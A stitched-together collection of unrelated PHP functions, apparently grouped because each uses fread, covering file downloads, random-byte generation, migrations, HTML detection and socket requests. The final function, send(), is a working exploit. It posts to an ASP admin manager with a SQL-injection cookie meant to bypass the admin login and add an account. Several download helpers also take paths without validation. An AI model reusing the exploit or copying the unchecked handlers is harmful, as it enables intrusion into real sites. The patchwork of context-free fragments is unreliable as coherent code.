private function getRandomBytes($count)
{
$bytes = '';
if (function_exists('openssl_random_pseudo_bytes') && strtoupper(substr(PHP_OS, 0, 3)) !== 'WIN') {
// OpenSSL slow on Win
$bytes = openssl_random_pseudo_bytes($count);
}
if ($bytes === '' && @is_readable('/dev/urandom') && ($hRand = @fopen('/dev/urandom', 'rb')) !== FALSE) {
$bytes = fread($hRand, $count);
fclose($hRand);
}
if (strlen($bytes) < $count) {
$bytes = '';
if ($this->randomState === null) {
$this->randomState = microtime();
if (function_exists('getmypid')) {
$this->randomState .= getmypid();
}
}
for ($i = 0; $i < $count; $i += 16) {
$this->randomState = md5(microtime() . $this->randomState);
if (PHP_VERSION >= '5') {
$bytes .= md5($this->randomState, true);
} else {
$bytes .= pack('H*', md5($this->randomState));
}
}
$bytes = substr($bytes, 0, $count);
}
return $bytes;
}
public static function isXliff($stringData = null, $fullPathToFile = null)
{
self::_reset();
$info = array();
if (!empty($stringData) && empty($fullPathToFile)) {
$stringData = substr($stringData, 0, 1024);
} elseif (empty($stringData) && !empty($fullPathToFile)) {
$info = FilesStorage::pathinfo_fix($fullPathToFile);
$file_pointer = fopen("{$fullPathToFile}", 'r');
// Checking Requirements (By specs, I know that xliff version is in the first 1KB)
$stringData = fread($file_pointer, 1024);
fclose($file_pointer);
} elseif (!empty($stringData) && !empty($fullPathToFile)) {
//we want to check extension and content
$info = FilesStorage::pathinfo_fix($fullPathToFile);
}
self::$fileType['info'] = $info;
//we want to check extension also if file path is specified
if (!empty($info) && !self::isXliffExtension()) {
//THIS IS NOT an xliff
return false;
}
// preg_match( '|<xliff\s.*?version\s?=\s?["\'](.*?)["\'](.*?)>|si', $stringData, $tmp );
if (!empty($stringData)) {
return array($stringData);
}
return false;
}
protected function downFile($path, $file_name)
{
header("Content-type:text/html;charset=utf-8");
// echo $path,$file_name;
//中文兼容
$file_name = iconv("utf-8", "gb2312", $file_name);
//获取网站根目录,这里可以换成你的下载目录
$file_sub_path = $path;
$file_path = $file_sub_path . $file_name;
//判断文件是否存在
if (!file_exists($file_path)) {
echo '文件不存在';
return;
}
$fp = fopen($file_path, "r");
$file_size = filesize($file_path);
//下载文件所需的header申明
Header("Content-type: application/octet-stream");
Header("Accept-Ranges: bytes");
Header("Accept-Length:" . $file_size);
Header("Content-Disposition: attachment; filename=" . $file_name);
$buffer = 1024;
$file_count = 0;
//返回数据到浏览器
while (!feof($fp) && $file_count < $file_size) {
$file_con = fread($fp, $buffer);
$file_count += $buffer;
echo $file_con;
}
fclose($fp);
}
public static function readRoutes($url, $params = array())
{
if (isset(self::$routes)) {
} else {
$filename = $_SERVER["DOCUMENT_ROOT"] . "/Init/routing.prop";
$f = fopen($filename, "r");
$r = fread($f, filesize($filename));
$prop = explode("\n", $r);
#print_r($prop);
for ($i = 0; $i < count($prop); $i++) {
if (substr($prop[$i], 0, 4) != " ") {
continue;
}
$params = array();
$row = true;
while ($row) {
$row = self::readRoutingRow($prop[$i++]);
if ($row) {
$params[$row[0]] = $row[1];
}
}
$i--;
if (self::checkMe($url, $params)) {
break;
}
}
}
}
function fsize($file)
{
// filesize will only return the lower 32 bits of
// the file's size! Make it unsigned.
$fmod = filesize($file);
if ($fmod < 0) {
$fmod += 2.0 * (PHP_INT_MAX + 1);
}
// find the upper 32 bits
$i = 0;
$myfile = fopen($file, "r");
// feof has undefined behaviour for big files.
// after we hit the eof with fseek,
// fread may not be able to detect the eof,
// but it also can't read bytes, so use it as an
// indicator.
while (strlen(fread($myfile, 1)) === 1) {
fseek($myfile, PHP_INT_MAX, SEEK_CUR);
$i++;
}
fclose($myfile);
// $i is a multiplier for PHP_INT_MAX byte blocks.
// return to the last multiple of 4, as filesize has modulo of 4 GB (lower 32 bits)
if ($i % 2 == 1) {
$i--;
}
// add the lower 32 bit to our PHP_INT_MAX multiplier
return (double) $i * (PHP_INT_MAX + 1) + $fmod;
}
function final_extract_install()
{
global $CONFIG, $lang_plugin_final_extract, $lang_plugin_final_extract_config, $thisplugin;
require 'plugins/final_extract/configuration.php';
require 'include/sql_parse.php';
if (!isset($CONFIG['fex_enable'])) {
$query = "INSERT INTO " . $CONFIG['TABLE_CONFIG'] . " VALUES ('fex_enable', '1');";
cpg_db_query($query);
// create table
$db_schema = $thisplugin->fullpath . '/schema.sql';
$sql_query = fread(fopen($db_schema, 'r'), filesize($db_schema));
$sql_query = preg_replace('/CPG_/', $CONFIG['TABLE_PREFIX'], $sql_query);
$sql_query = remove_remarks($sql_query);
$sql_query = split_sql_file($sql_query, ';');
foreach ($sql_query as $q) {
cpg_db_query($q);
}
// Put default setting
$db_schema = $thisplugin->fullpath . '/basic.sql';
$sql_query = fread(fopen($db_schema, 'r'), filesize($db_schema));
$sql_query = preg_replace('/CPG_/', $CONFIG['TABLE_PREFIX'], $sql_query);
$sql_query = remove_remarks($sql_query);
$sql_query = split_sql_file($sql_query, ';');
foreach ($sql_query as $q) {
cpg_db_query($q);
}
}
return true;
}
function mci_file_read_local($p_diskfile)
{
$t_handle = fopen($p_diskfile, "r");
$t_content = fread($t_handle, filesize($p_diskfile));
fclose($t_handle);
return $t_content;
}
/**
* Get the specified number of random bytes.
*
* Attempts to use a cryptographically secure (not predictable)
* source of randomness if available. If there is no high-entropy
* randomness source available, it will fail. As a last resort,
* for non-critical systems, define
* <code>Auth_OpenID_RAND_SOURCE</code> as <code>null</code>, and
* the code will fall back on a pseudo-random number generator.
*
* @param int $num_bytes The length of the return value
* @return string $bytes random bytes
*/
function getBytes($num_bytes)
{
static $f = null;
$bytes = '';
if ($f === null) {
if (Auth_OpenID_RAND_SOURCE === null) {
$f = false;
} else {
$f = @fopen(Auth_OpenID_RAND_SOURCE, "r");
if ($f === false) {
$msg = 'Define Auth_OpenID_RAND_SOURCE as null to ' . ' continue with an insecure random number generator.';
trigger_error($msg, E_USER_ERROR);
}
}
}
if ($f === false) {
// pseudorandom used
$bytes = '';
for ($i = 0; $i < $num_bytes; $i += 4) {
$bytes .= pack('L', mt_rand());
}
$bytes = substr($bytes, 0, $num_bytes);
} else {
$bytes = fread($f, $num_bytes);
}
return $bytes;
}
function downloadToString()
{
$crlf = "\r\n";
// generate request
$req = 'GET ' . $this->_uri . ' HTTP/1.0' . $crlf . 'Host: ' . $this->_host . $crlf . $crlf;
// fetch
$this->_fp = fsockopen(($this->_protocol == 'https' ? 'ssl://' : '') . $this->_host, $this->_port);
fwrite($this->_fp, $req);
while (is_resource($this->_fp) && $this->_fp && !feof($this->_fp)) {
$response .= fread($this->_fp, 1024);
}
fclose($this->_fp);
// split header and body
$pos = strpos($response, $crlf . $crlf);
if ($pos === false) {
return $response;
}
$header = substr($response, 0, $pos);
$body = substr($response, $pos + 2 * strlen($crlf));
// parse headers
$headers = array();
$lines = explode($crlf, $header);
foreach ($lines as $line) {
if (($pos = strpos($line, ':')) !== false) {
$headers[strtolower(trim(substr($line, 0, $pos)))] = trim(substr($line, $pos + 1));
}
}
// redirection?
if (isset($headers['location'])) {
$http = new ilHttpRequest($headers['location']);
return $http->DownloadToString($http);
} else {
return $body;
}
}
/**
* @test
*/
public function canReadFromLargeFile()
{
$fp = fopen($this->largeFile->url(), 'rb');
$data = fread($fp, 15);
fclose($fp);
$this->assertEquals(str_repeat(' ', 15), $data);
}
/**
Upload a profile picture for the group
*/
function save_picture($ext)
{
global $cfg;
if (!$this->user->logged_in() || !$this->user->group) {
throw new Exception("Access denied!");
}
if (!isset($_SERVER["CONTENT_LENGTH"])) {
throw new Exception("Invalid parameters");
}
$size = (int) $_SERVER["CONTENT_LENGTH"];
$file_name = rand() . time() . "{$this->user->id}.{$ext}";
$file_path = "{$cfg['dir']['content']}{$file_name}";
// Write the new one
$input = fopen("php://input", "rb");
$output = fopen($file_path, "wb");
if (!$input || !$output) {
throw new Exception("Cannot open files!");
}
while ($size > 0) {
$data = fread($input, $size > 1024 ? 1024 : $size);
$size -= 1024;
fwrite($output, $data);
}
fclose($input);
fclose($output);
// Update the profile image
$this->group->update($this->user->group, array('picture' => $file_name));
}
/**
* @return bool
*/
public function analyze()
{
$info =& $this->getid3->info;
fseek($this->getid3->fp, $info['avdataoffset'], SEEK_SET);
$EXEheader = fread($this->getid3->fp, 28);
$magic = 'MZ';
if (substr($EXEheader, 0, 2) != $magic) {
$info['error'][] = 'Expecting "' . Helper::PrintHexBytes($magic) . '" at offset ' . $info['avdataoffset'] . ', found "' . Helper::PrintHexBytes(substr($EXEheader, 0, 2)) . '"';
return false;
}
$info['fileformat'] = 'exe';
$info['exe']['mz']['magic'] = 'MZ';
$info['exe']['mz']['raw']['last_page_size'] = Helper::LittleEndian2Int(substr($EXEheader, 2, 2));
$info['exe']['mz']['raw']['page_count'] = Helper::LittleEndian2Int(substr($EXEheader, 4, 2));
$info['exe']['mz']['raw']['relocation_count'] = Helper::LittleEndian2Int(substr($EXEheader, 6, 2));
$info['exe']['mz']['raw']['header_paragraphs'] = Helper::LittleEndian2Int(substr($EXEheader, 8, 2));
$info['exe']['mz']['raw']['min_memory_paragraphs'] = Helper::LittleEndian2Int(substr($EXEheader, 10, 2));
$info['exe']['mz']['raw']['max_memory_paragraphs'] = Helper::LittleEndian2Int(substr($EXEheader, 12, 2));
$info['exe']['mz']['raw']['initial_ss'] = Helper::LittleEndian2Int(substr($EXEheader, 14, 2));
$info['exe']['mz']['raw']['initial_sp'] = Helper::LittleEndian2Int(substr($EXEheader, 16, 2));
$info['exe']['mz']['raw']['checksum'] = Helper::LittleEndian2Int(substr($EXEheader, 18, 2));
$info['exe']['mz']['raw']['cs_ip'] = Helper::LittleEndian2Int(substr($EXEheader, 20, 4));
$info['exe']['mz']['raw']['relocation_table_offset'] = Helper::LittleEndian2Int(substr($EXEheader, 24, 2));
$info['exe']['mz']['raw']['overlay_number'] = Helper::LittleEndian2Int(substr($EXEheader, 26, 2));
$info['exe']['mz']['byte_size'] = ($info['exe']['mz']['raw']['page_count'] - 1) * 512 + $info['exe']['mz']['raw']['last_page_size'];
$info['exe']['mz']['header_size'] = $info['exe']['mz']['raw']['header_paragraphs'] * 16;
$info['exe']['mz']['memory_minimum'] = $info['exe']['mz']['raw']['min_memory_paragraphs'] * 16;
$info['exe']['mz']['memory_recommended'] = $info['exe']['mz']['raw']['max_memory_paragraphs'] * 16;
$info['error'][] = 'EXE parsing not enabled in this version of GetId3Core() [' . $this->getid3->version() . ']';
return false;
}
public static function echoFileContent($filename)
{
$handle = fopen($filename, "r");
$contents = fread($handle, filesize($filename));
fclose($handle);
echo $contents;
}
function file_to_str($file, $size)
{
$link = start_nchsls();
$fd = fopen($file, 'r');
$str = fread($fd, $size);
return mysql_real_escape_string($str, $link);
}
function httpGet($host, $base_fd)
{
global $index;
$fd = stream_socket_client("{$host}", $errno, $errstr, 3, STREAM_CLIENT_ASYNC_CONNECT | STREAM_CLIENT_CONNECT);
$index[$fd] = 0;
$event_fd = event_new();
event_set($event_fd, $fd, EV_WRITE | EV_PERSIST, function ($fd, $events, $arg) use($host) {
global $times, $limit, $index;
if (!$index[$fd]) {
$index[$fd] = 1;
$out = "GET / HTTP/1.1\r\n";
$out .= "Host: {$host}\r\n";
$out .= "Connection: Close\r\n\r\n";
fwrite($fd, $out);
} else {
$str = fread($fd, 4096);
echo $str, PHP_EOL;
if (feof($fd)) {
fclose($fd);
$times++;
echo "done\n";
if ($times == $limit - 1) {
event_base_loopexit($arg[1]);
}
}
}
}, array($event_fd, $base_fd));
event_base_set($event_fd, $base_fd);
event_add($event_fd);
}
public function getDocuments($name)
{
if (!file_exists($this->_getFilePathName($name))) {
return array();
}
$fp = fopen($this->_getFilePathName($name), 'r');
$filesize = filesize($this->_getFilePathName($name));
if ($filesize % MULTIINDEX_DOCUMENTBYTESIZE != 0) {
throw new Exception('Filesize not correct index is corrupt!');
}
$ret = array();
$count = 0;
for ($i = 0; $i < $filesize / MULTIINDEX_DOCUMENTBYTESIZE; $i++) {
$bindata1 = fread($fp, MULTIINDEX_DOCUMENTINTEGERBYTESIZE);
$bindata2 = fread($fp, MULTIINDEX_DOCUMENTINTEGERBYTESIZE);
$bindata3 = fread($fp, MULTIINDEX_DOCUMENTINTEGERBYTESIZE);
$data1 = unpack('i', $bindata1);
$data2 = unpack('i', $bindata2);
$data3 = unpack('i', $bindata3);
$ret[] = array($data1[1], $data2[1], $data3[1]);
$count++;
if ($count == MULTIINDEX_DOCUMENTRETURN) {
break;
}
}
fclose($fp);
return $ret;
}
public function signature_split($orgfile, $input)
{
$info = unpack('n', fread($input, 2));
$blocksize = $info[1];
$this->info['transferid'] = mt_rand();
$count = 0;
$needed = array();
$cache = $this->getCache();
$prefix = $this->getPrefix();
while (!feof($orgfile)) {
$new_md5 = fread($input, 16);
if (feof($input)) {
break;
}
$data = fread($orgfile, $blocksize);
$org_md5 = md5($data, true);
if ($org_md5 == $new_md5) {
$cache->set($prefix . $count, $data);
} else {
$needed[] = $count;
}
$count++;
}
return array('transferid' => $this->info['transferid'], 'needed' => $needed, 'count' => $count);
}
public static function download($fullPath)
{
if ($fd = fopen($fullPath, 'r')) {
$fsize = filesize($fullPath);
$path_parts = pathinfo($fullPath);
$ext = strtolower($path_parts['extension']);
switch ($ext) {
case 'pdf':
header('Content-type: application/pdf');
// add here more headers for diff. extensions
header('Content-Disposition: attachment; filename="' . $path_parts['basename'] . '"');
// use 'attachment' to force a download
break;
default:
header('Content-type: application/octet-stream');
header('Content-Disposition: filename="' . $path_parts['basename'] . '"');
break;
}
header("Content-length: {$fsize}");
header('Cache-control: private');
//use this to open files directly
while (!feof($fd)) {
$buffer = fread($fd, 2048);
echo $buffer;
}
}
fclose($fd);
}
function form_save()
{
if (isset($_POST["save_component_import"])) {
if (trim($_POST["import_text"] != "")) {
/* textbox input */
$xml_data = $_POST["import_text"];
} elseif ($_FILES["import_file"]["tmp_name"] != "none" && $_FILES["import_file"]["tmp_name"] != "") {
/* file upload */
$fp = fopen($_FILES["import_file"]["tmp_name"], "r");
$xml_data = fread($fp, filesize($_FILES["import_file"]["tmp_name"]));
fclose($fp);
} else {
header("Location: templates_import.php");
exit;
}
if ($_POST["import_rra"] == "1") {
$import_custom_rra_settings = false;
} else {
$import_custom_rra_settings = true;
}
/* obtain debug information if it's set */
$debug_data = import_xml_data($xml_data, $import_custom_rra_settings);
if (sizeof($debug_data) > 0) {
$_SESSION["import_debug_info"] = $debug_data;
}
header("Location: templates_import.php");
}
}
/**
* Return an CT file for download
*/
function churchcore__filedownload()
{
global $files_dir;
include_once CHURCHCORE . "/churchcore_db.php";
$mime_types = getMimeTypes();
$file = db_query("select * from {cc_file} f where f.id=:id and filename=:filename", array(":id" => $_GET["id"], ":filename" => $_GET["filename"]))->fetch();
$filename = "{$files_dir}/files/{$file->domain_type}/{$file->domain_id}/{$file->filename}";
$handle = fopen($filename, "rb");
if ($handle == false) {
echo "Die Datei konnte nicht gefunden werden!";
} else {
$contents = fread($handle, filesize($filename));
fclose($handle);
if (isset($mime_types[substr(strrchr($filename, '.'), 1)])) {
drupal_add_http_header('Content-Type', $mime_types[substr(strrchr($filename, '.'), 1)], false);
} else {
drupal_add_http_header('Content-Type', 'application/unknown', false);
}
if (isset($_GET["type"]) && $_GET["type"] == "download") {
drupal_add_http_header('Content-Disposition', 'attachment;filename="' . $file->bezeichnung . '"', false);
} else {
drupal_add_http_header('Content-Disposition', 'inline;filename="' . $file->bezeichnung . '"', false);
}
drupal_add_http_header('Cache-Control', 'must-revalidate, post-check=0, pre-check=0', false);
drupal_add_http_header('Cache-Control', 'private', true);
$content = drupal_get_header();
echo $contents;
}
}
function execute($cmd, &$output, &$error, &$returnCode)
{
$descriptorspec = array(1 => array('pipe', 'w'), 2 => array('pipe', 'w'));
$process = proc_open($cmd, $descriptorspec, $pipes);
if (!is_resource($process)) {
throw new RuntimeException("Unable to execute the command. [{$cmd}]");
}
stream_set_blocking($pipes[1], false);
stream_set_blocking($pipes[2], false);
$output = $error = '';
foreach ($pipes as $key => $pipe) {
while (!feof($pipe)) {
if (!($line = fread($pipe, 128))) {
continue;
}
if (1 == $key) {
$output .= $line;
// stdout
} else {
$error .= $line;
// stderr
}
}
fclose($pipe);
}
$returnCode = proc_close($process);
}
public static function processemail($emailsrc, $pdfout, $coverfile = '')
{
$combfilelist = array();
# Process the email
$emailparts = Mail_mimeDecode::decode(array('include_bodies' => true, 'decode_bodies' => true, 'decode_headers' => true, 'input' => file_get_contents($emailsrc), 'crlf' => "\r\n"));
# Process the cover if it exists
if ($coverfile !== '') {
$combfilelist[] = self::processpart(file_get_contents($coverfile), mime_content_type($coverfile));
}
# Process the parts
$combfilelist = array_merge($combfilelist, self::processparts($emailparts));
# Create an intermediate file to build the pdf
$tmppdffilename = sys_get_temp_dir() . '/e2p-' . (string) abs((int) (microtime(true) * 100000)) . '.pdf';
# Build the command to combine all of the intermediate files into one
$conbcom = str_replace(array_merge(array('INTFILE', 'COMBLIST'), array_keys(self::$driver_paths)), array_merge(array($tmppdffilename, implode(' ', $combfilelist)), array_values(self::$driver_paths)), self::$mime_drivers['gs']);
exec($conbcom);
# Remove the intermediate files
foreach ($combfilelist as $combfilename) {
unlink($combfilename);
}
# Write the intermediate file to the final destination
$intfileres = fopen($tmppdffilename, 'rb');
$outfileres = fopen($pdfout, 'ab');
while (!feof($intfileres)) {
fwrite($outfileres, fread($intfileres, 8192));
}
fclose($intfileres);
fclose($outfileres);
# Remove the intermediate file
unlink($tmppdffilename);
}
public function dwld()
{
$this->min();
if (is_numeric($this->getParam("id"))) {
$this->download->newDownload();
if ($this->download->getIsLocal()) {
$url = OWEB_DIR_DATA . "/downloads/" . $this->download->getUrl();
header('Content-Description: File Transfer');
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="' . basename($url) . '";');
readfile($url);
} else {
$url = OWEB_DIR_DATA . "/downloads/" . $this->download->getUrl();
header("Content-Disposition: attachment; filename=" . basename($url));
header("Content-Type: application/force-download");
header("Content-Type: application/octet-stream");
header("Content-Type: application/download");
header("Content-Description: File Transfer");
header("Content-Length: " . filesize($url));
flush();
// this doesn't really matter.
$fp = fopen($url, "r");
while (!feof($fp)) {
echo fread($fp, 65536);
flush();
// this is essential for large downloads
}
fclose($fp);
}
} else {
throw new \Model\downloads\exception\DownloadCantBeFind("No Download ID given");
}
}
/**
* _read
*
* @param int $bytes Bytes to read
*
* @access private
* @return mixed
*/
function _read($bytes = 1)
{
if (0 < ($bytes = abs($bytes))) {
return fread($this->_handle, $bytes);
}
return null;
}
/**
* @param $file_name
* @return array
* @throws ApplicationException
*/
public static function generate($file_name)
{
set_time_limit(0);
$temp_file = TempFileProvider::generate("peaks", ".raw");
$command = sprintf("%s -v quiet -i %s -ac 1 -f u8 -ar 11025 -acodec pcm_u8 %s", self::$ffmpeg_cmd, escapeshellarg($file_name), escapeshellarg($temp_file));
shell_exec($command);
if (!file_exists($temp_file)) {
throw new ApplicationException("Waveform could not be generated!");
}
$chunk_size = ceil(filesize($temp_file) / self::PEAKS_RESOLUTION);
$peaks = withOpenedFile($temp_file, "r", function ($fh) use(&$chunk_size) {
while ($data = fread($fh, $chunk_size)) {
$peak = 0;
$array = str_split($data);
foreach ($array as $item) {
$code = ord($item);
if ($code > $peak) {
$peak = $code;
}
if ($code == 255) {
break;
}
}
(yield $peak - 127);
}
});
TempFileProvider::delete($temp_file);
return $peaks;
}
/**
* Task to run pending migrations
*
* @return null
*/
protected function _execute(array $params)
{
$migrations = new MigrationManager();
Database::$default = $params['db'];
$this->db = Database::instance();
$db_config = Kohana::$config->load('database')->{$params['db']};
if (!ORM::factory('Migration')->is_installed()) {
/**
* Get platform from database config
*/
$platform = strtolower($db_config['type']);
if ('mysqli' == $platform) {
$platform = 'mysql';
}
/**
* Get SQL from file for selected platform
*/
$file = realpath(substr(__DIR__, 0, strlen(__DIR__) - strlen('classes/Task/Db')) . 'sql/' . $platform . '.sql');
$handle = fopen($file, 'rb');
$sql_create = fread($handle, filesize($file));
$this->db->query(0, $sql_create);
$msg = Minion_CLI::color("-----------------------------\n", 'green');
$msg .= Minion_CLI::color("| Migration table create!!! |\n", 'green');
$msg .= Minion_CLI::color("-----------------------------\n", 'green');
Minion_CLI::write($msg);
}
$migrations->migrate($params['db'], $params['step']);
}
/**
* Detect HTML in the first KB to prevent against potential security issue with
* IE/Safari/Opera file type auto detection bug.
* Returns true if file contain insecure HTML code at the beginning.
*
* @param string $filePath absolute path to file
* @return boolean
*/
function DetectHtml($filePath)
{
$fp = fopen($filePath, 'rb');
$chunk = fread($fp, 1024);
fclose($fp);
$chunk = strtolower($chunk);
if (!$chunk) {
return false;
}
$chunk = trim($chunk);
if (preg_match("/<!DOCTYPE\\W*X?HTML/sim", $chunk)) {
return true;
}
$tags = array('<body', '<head', '<html', '<img', '<pre', '<script', '<table', '<title');
foreach ($tags as $tag) {
if (false !== strpos($chunk, $tag)) {
return true;
}
}
//type = javascript
if (preg_match('!type\\s*=\\s*[\'"]?\\s*(?:\\w*/)?(?:ecma|java)!sim', $chunk)) {
return true;
}
//href = javascript
//src = javascript
//data = javascript
if (preg_match('!(?:href|src|data)\\s*=\\s*[\'"]?\\s*(?:ecma|java)script:!sim', $chunk)) {
return true;
}
//url(javascript
if (preg_match('!url\\s*\\(\\s*[\'"]?\\s*(?:ecma|java)script:!sim', $chunk)) {
return true;
}
return false;
}
function avmaker_configure($stop = true)
{
global $errors, $CONFIG;
require 'include/sql_parse.php';
$db_update = 'plugins/avmaker/sql/basic.sql';
$sql_query = fread(fopen($db_update, 'r'), filesize($db_update));
// Update table prefix
$sql_query = preg_replace('/CPG_/', $CONFIG['TABLE_PREFIX'], $sql_query);
$sql_query = remove_remarks($sql_query);
$sql_query = split_sql_file($sql_query, ';');
?>
<h2>Performing Database Updates<h2>
<table class="maintable">
<?php
foreach ($sql_query as $q) {
echo "<tr><td class='debug_text' style='color: black;'>\r\n\t\t{$q}\r\n\t\t</td>";
if (mysql_query($q)) {
echo "<td class='debug_text' style='color: green;'>OK</td></tr>";
} else {
echo "<td class='debug_text' style='color: black;'>Already Done</td></tr>";
}
}
echo "</table>";
if ($stop) {
echo <<<EOT
<form action="{$_SERVER['REQUEST_URI']}" method="post">
<input type="submit" value="Go!" name="submit" />
</form>
EOT;
}
}
function send($cmd)
{
global $host, $path;
$message = "POST " . $path . "admin/admin_manager.asp?action=add HTTP/1.1\r\n";
$message .= "Accept: */*\r\n";
$message .= "Referer: http://{$host}{$path}\r\n";
$message .= "Accept-Language: zh-cn\r\n";
$message .= "Content-Type: application/x-www-form-urlencoded\r\n";
$message .= "User-Agent: securitylab\r\n";
$message .= "X-Forwarded-For:1.1.1.1\r\n";
$message .= "Host: {$host}\r\n";
$message .= "Content-Length: " . strlen($cmd) . "\r\n";
$message .= "Cookie: m_username=securitylab'%20union%20select%20663179683474,0%20from%20m_manager%20where%20m_username%3d'admin; m_level=0; checksecuritylab'%20union%20select%20663179683474,0%20from%20m_manager%20where%20m_username%3d'admin=cf144fd7a325d1088456838f524ae9d7\r\n";
$message .= "Connection: Close\r\n\r\n";
$message .= $cmd;
echo $message;
$fp = fsockopen($host, 80);
fputs($fp, $message);
$resp = '';
while ($fp && !feof($fp)) {
$resp .= fread($fp, 1024);
}
echo $resp;
return $resp;
}
